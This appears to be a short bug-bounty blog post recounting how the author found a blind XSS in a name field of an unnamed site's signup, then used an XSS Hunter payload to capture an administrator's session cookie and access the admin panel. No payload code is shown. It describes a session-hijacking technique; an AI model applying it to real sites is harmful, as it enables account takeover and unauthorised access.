Today I’m writing a blog post after long time. How I got 22000$ by pawning a website. Though it’s a private program so can’t disclose the name I’ll be using example.com to explain that how I’ve exploited blind XSS to pwn the website.
I was doing the monkey test on name field to get an XSS without having any idea if my payload will execute or not. So I just entered payload
but nothing worked for me. Next day I got a message from team member of the company that one alert is coming on the admin panel whenever they go to verify account function so here I came to know that there was a blind XSS over the name field. I used XSS hunter payload to get the admin user cookies as the payload was executing over the admin panel.
As soon as admin try to verify my account I got the session in xss hunter and from there I was able to access panel of the application
I got other bugs as well.